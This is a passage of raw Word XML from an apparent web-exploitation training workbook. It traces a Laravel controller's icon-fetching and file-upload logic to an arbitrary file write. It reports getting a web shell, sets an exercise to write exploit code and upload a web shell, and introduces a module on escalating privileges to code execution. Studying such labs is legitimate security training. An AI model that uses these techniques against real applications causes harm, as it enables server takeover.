          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76484">
        <w:t>`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6620429E" w14:textId="5A579DD9" w:rsidR="00F76484" w:rsidRDefault="007F378A" w:rsidP="00F76484">
      <w:r w:rsidRPr="007F378A">
        <w:t>To access the `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F378A">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>ItemController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F378A">
        <w:t>` from the web application, open the `</w:t>
      </w:r>
      <w:r w:rsidRPr="007F378A">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>routes/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F378A">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>web.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F378A">
        <w:t>` file and look for any routes that reference `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F378A">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>ItemController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F378A">
        <w:t>`. This will show you how the controller is linked to specific routes in the application and how it can be accessed via the web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A14F4D7" w14:textId="60C9DFA7" w:rsidR="007F378A" w:rsidRDefault="007F378A" w:rsidP="007F378A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007F378A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B95E96D" wp14:editId="3A8AFD29">
            <wp:extent cx="4267796" cy="533474"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
            <wp:docPr id="87425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502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6EE14" w14:textId="590D7665" w:rsidR="007F378A" w:rsidRDefault="007F378A" w:rsidP="007F378A">
      <w:r>
        <w:t>What the heck is `</w:t>
      </w:r>
      <w:r w:rsidRPr="007F378A">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>Route::resource</w:t>
      </w:r>
      <w:r>
        <w:t>`?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFEA221" w14:textId="31E0A7A3" w:rsidR="007F378A" w:rsidRDefault="007F378A" w:rsidP="007F378A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007F378A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="128BDBA7" wp14:editId="28D1426B">
            <wp:extent cx="5731510" cy="5959475"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="22225"/>
            <wp:docPr id="192615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580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EA54E" w14:textId="093FB430" w:rsidR="007E4CA0" w:rsidRDefault="007E4CA0" w:rsidP="007E4CA0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tldr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="007E4CA0">
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="007E4CA0">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>/items</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="007E4CA0">
        <w:t xml:space="preserve"> route will be handled by </w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E4CA0">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>ItemController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E4CA0">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E4CA0">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BF05CD8" w14:textId="77777777" w:rsidR="007E4CA0" w:rsidRDefault="007E4CA0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2DEF1D" w14:textId="7DB4653C" w:rsidR="007E4CA0" w:rsidRDefault="007E4CA0" w:rsidP="007E4CA0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc183609099"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="6F68C1F9" w14:textId="3FE88189" w:rsidR="007E4CA0" w:rsidRDefault="007E4CA0" w:rsidP="007E4CA0">
      <w:r w:rsidRPr="007E4CA0">
        <w:t>The problematic code resides in function `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E4CA0">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>storelogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E4CA0">
        <w:t xml:space="preserve">`.  </w:t>
      </w:r>
      <w:r>
        <w:t>This particular function code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1B2718" w14:textId="1F1E94C2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elseif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in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icon'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http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 // [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB7B84E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$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9267A73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s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4348032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erify_pe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26BFA6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erify_peer_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2933A12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5277444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A44998" w14:textId="3363DB25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$conten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_get_conte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in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icon'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eam_context_cre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options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)); // [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA8247B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8C81D7" w14:textId="1FA79E5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 w:rsidR="00927B0C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> // [3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5DD205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ic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application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ic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4EFD81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602915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fi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in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icon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150810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h_par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h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fi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CE303FC" w14:textId="78DD67CD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ic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d5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content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1CC0E6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icon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.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.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h_par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extension'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6211630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5D1916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$pa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icons/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$ic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4983F2D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BC878D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Private apps could have here duplicated icons folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA8FCC5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pa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icons/icons/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3F5F585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pa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_repl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icons/icons/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icons/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$pat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D8D4FF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7000D8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660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Storag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dis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public'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>exis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path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DD3FE0" w14:textId="274E42CE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torag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dis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public'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>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pa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$contents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>); // [</w:t>
      </w:r>
      <w:r w:rsidR="00927B0C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600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0BE85350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D0DCDB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merge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B5B19F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ico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$pa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A6C0889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1D905F91" w14:textId="77777777" w:rsidR="007E4CA0" w:rsidRDefault="007E4C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3523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C72562" w14:textId="33CF4316" w:rsidR="00927B0C" w:rsidRDefault="00927B0C" w:rsidP="00927B0C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Here is a breakdown of the logic in the `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00927B0C">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>storelogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>` function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF1EB15" w14:textId="73416918" w:rsidR="00927B0C" w:rsidRDefault="00927B0C" w:rsidP="00927B0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00927B0C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>: The code checks if the input parameter `</w:t>
      </w:r>
      <w:r w:rsidRPr="00927B0C">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
      <w:r>
        <w:t>` starts with `</w:t>
      </w:r>
      <w:r w:rsidRPr="00927B0C">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:t>`. If it does, it continues executing the logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D44D3D" w14:textId="152028FD" w:rsidR="00927B0C" w:rsidRDefault="00927B0C" w:rsidP="00927B0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00927B0C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>: The application makes an HTTP request with SSL verification turned off (?).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA3D102" w14:textId="0E725212" w:rsidR="00927B0C" w:rsidRDefault="00927B0C" w:rsidP="00927B0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidRPr="00927B0C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>: It checks if the `</w:t>
      </w:r>
      <w:r w:rsidRPr="00927B0C">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>$application</w:t>
      </w:r>
      <w:r>
        <w:t>` variable holds a valid application. If it does, it uses the application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>s icon in the database (but this not what we want). If not, it moves on to construct the file name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E78C54E" w14:textId="52953CE8" w:rsidR="00927B0C" w:rsidRDefault="00927B0C" w:rsidP="00927B0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Finally, the content from the request gets stored at `</w:t>
      </w:r>
      <w:r w:rsidRPr="00927B0C">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>$path</w:t>
      </w:r>
      <w:r>
        <w:t>`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184F2CF5" w14:textId="5A3637CC" w:rsidR="00927B0C" w:rsidRDefault="00927B0C" w:rsidP="00927B0C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This flow gives us a good starting point to debug the issues with storing the icon and related logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A44C9F" w14:textId="502C2AF2" w:rsidR="00927B0C" w:rsidRDefault="00927B0C" w:rsidP="00927B0C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00927B0C">
        <w:t>The `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00927B0C">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>storelogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00927B0C">
        <w:t>` function isn't directly mapped to any route. To figure out where it's being called from, you'll need to trace the functionality that triggers this method. Check the controller code where `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00927B0C">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>storelogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00927B0C">
        <w:t>` might be invoked, like within a form submission or another method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7712C96B" w14:textId="6CC33BE4" w:rsidR="0097062B" w:rsidRDefault="0097062B" w:rsidP="00927B0C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The function invoked twice within the controller, one with `</w:t>
      </w:r>
      <w:r w:rsidRPr="0097062B">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>store</w:t>
      </w:r>
      <w:r>
        <w:t>` method and another is `</w:t>
      </w:r>
      <w:r w:rsidRPr="0097062B">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>update</w:t>
      </w:r>
      <w:r>
        <w:t>` method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E0B92F" w14:textId="24DB1DF0" w:rsidR="0097062B" w:rsidRDefault="0097062B" w:rsidP="00927B0C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>POST request to `</w:t>
      </w:r>
      <w:r w:rsidRPr="0097062B">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>/items</w:t>
      </w:r>
      <w:r>
        <w:t>` and `</w:t>
      </w:r>
      <w:r w:rsidRPr="0097062B">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>/items/{id}</w:t>
      </w:r>
      <w:r>
        <w:t>` will invoke `</w:t>
      </w:r>
      <w:r w:rsidRPr="0097062B">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>store</w:t>
      </w:r>
      <w:r>
        <w:t>`/`</w:t>
      </w:r>
      <w:r w:rsidRPr="0097062B">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>update</w:t>
      </w:r>
      <w:r>
        <w:t>` which will invoke `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0097062B">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>storelogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">`. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A1FF00" w14:textId="77777777" w:rsidR="00DA16F8" w:rsidRDefault="00DA16F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2F8AD6FF" w14:textId="77777777" w:rsidR="00DA16F8" w:rsidRDefault="00DA16F8" w:rsidP="00DA16F8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc183609100"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Proof of Concept</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="7B9F357E" w14:textId="6E1D167A" w:rsidR="00DA16F8" w:rsidRPr="00DA16F8" w:rsidRDefault="00DA16F8" w:rsidP="00DA16F8">
      <w:r>
        <w:t>Create new app listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3B6565" w14:textId="77777777" w:rsidR="00DA16F8" w:rsidRDefault="00DA16F8" w:rsidP="00DA16F8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA16F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67BED4FB" wp14:editId="6F907376">
            <wp:extent cx="5731510" cy="651510"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="15240"/>
            <wp:docPr id="178275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555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47EFA" w14:textId="20C80F7D" w:rsidR="00DA16F8" w:rsidRDefault="00DA16F8" w:rsidP="00DA16F8">
      <w:r>
        <w:t xml:space="preserve">And we got </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41650F84" w14:textId="03AC6906" w:rsidR="00DA16F8" w:rsidRDefault="00DA16F8" w:rsidP="00DA16F8">
      <w:r w:rsidRPr="00DA16F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0845C733" wp14:editId="2EAD3BE2">
            <wp:extent cx="5731510" cy="1040765"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="26035"/>
            <wp:docPr id="69051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191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4D41A" w14:textId="3E6EF531" w:rsidR="00927B0C" w:rsidRDefault="00927B0C" w:rsidP="00927B0C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc183609101"/>
      <w:r>
        <w:t>Exercise</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="24E6508E" w14:textId="510600FF" w:rsidR="0097062B" w:rsidRDefault="0097062B" w:rsidP="0097062B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc183609102"/>
      <w:r>
        <w:t>Exploit code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="04E6F91D" w14:textId="77777777" w:rsidR="00DA16F8" w:rsidRDefault="00DA16F8" w:rsidP="0008031F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your task is to build proof of concept code to exploit this vulnerability. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510C726C" w14:textId="3CB9DAED" w:rsidR="00DA16F8" w:rsidRDefault="00DA16F8" w:rsidP="0008031F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Before start the task, you need to execute following command to link the storage folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FA7760" w14:textId="77777777" w:rsidR="00DA16F8" w:rsidRDefault="00DA16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63262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ocker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>exe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mda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www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artisa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or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link</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E417892" w14:textId="549E2EA2" w:rsidR="00DA16F8" w:rsidRDefault="00DA16F8" w:rsidP="0097062B">
      <w:r>
        <w:t>All uploaded file will be in `http://localhost:8888/storage/`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61930B3B" w14:textId="4756AAFE" w:rsidR="00DA16F8" w:rsidRDefault="00DA16F8" w:rsidP="0008031F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tips: you can always place `</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA16F8">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>dd()</w:t>
      </w:r>
      <w:r>
        <w:t>` function anywhere in the code to check value of the variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFF236F" w14:textId="67D5FC3F" w:rsidR="00DA16F8" w:rsidRDefault="00DA16F8" w:rsidP="00DA16F8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc183609103"/>
      <w:r>
        <w:t>File upload functionalities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="61879523" w14:textId="106270F9" w:rsidR="0008031F" w:rsidRPr="0008031F" w:rsidRDefault="0008031F" w:rsidP="0008031F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0008031F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B94C638" wp14:editId="058509F2">
            <wp:extent cx="5525271" cy="1143160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="169019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952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8F74" w14:textId="1C6B12DA" w:rsidR="00DA16F8" w:rsidRDefault="0008031F" w:rsidP="0008031F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0008031F">
        <w:t>The `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008031F">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>storelogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008031F">
        <w:t xml:space="preserve">` method </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidRPr="0008031F">
        <w:t>handles file uploads, so you need to check if this functionality could be exploited to upload a web shell.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0360E8BF" w14:textId="27EB6B95" w:rsidR="0008031F" w:rsidRDefault="0008031F" w:rsidP="0008031F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc183609104"/>
      <w:r>
        <w:t>Other type of vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="28EDC9BE" w14:textId="7F193867" w:rsidR="00FF1C71" w:rsidRDefault="0008031F" w:rsidP="0008031F">
      <w:r w:rsidRPr="0008031F">
        <w:t>What other types of vulnerabilities might be present in this application?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0595D5DC" w14:textId="77777777" w:rsidR="00FF1C71" w:rsidRDefault="00FF1C71">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE714E4" w14:textId="27179133" w:rsidR="0008031F" w:rsidRDefault="00FF1C71" w:rsidP="00FF1C71">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc183609105"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Module 2 </w:t>
      </w:r>
      <w:r w:rsidR="007D13FC">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D13FC">
        <w:t>Privilege Escalation to Code Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="66B09308" w14:textId="77777777" w:rsidR="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc183609106"/>
      <w:r>
        <w:t>Getting Started</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="3D95E2F5" w14:textId="30720DEB" w:rsidR="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00174C2D">
        <w:t>For this module, the working directory is located at `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>$HOME/classroom/module-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00174C2D">
        <w:t>`. Start by navigating to this directory in your terminal. Once you're there, run the command `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>./bin/start.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00174C2D">
        <w:t>` to launch the module server. After everything is set up, the target web application will be accessible at `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>http://localhost:8888/</w:t>
      </w:r>
      <w:r w:rsidRPr="00174C2D">
        <w:t>`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFF823D" w14:textId="62A59035" w:rsidR="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007D13FC">
        <w:t xml:space="preserve">At the time of writing, the current version of the app is </w:t>
      </w:r>
      <w:r w:rsidRPr="007D13FC">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>4.8.0</w:t>
      </w:r>
      <w:r w:rsidRPr="007D13FC">
        <w:t>. So, any vulnerabilities you find will be considered zero-day, which means it's time to grab those CVEs!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41345481" w14:textId="796454F8" w:rsidR="00066304" w:rsidRDefault="00FF11F0" w:rsidP="007D13FC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vendor </w:t>
      </w:r>
      <w:r w:rsidR="00066304">
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:r w:rsidR="00066304" w:rsidRPr="00066304">
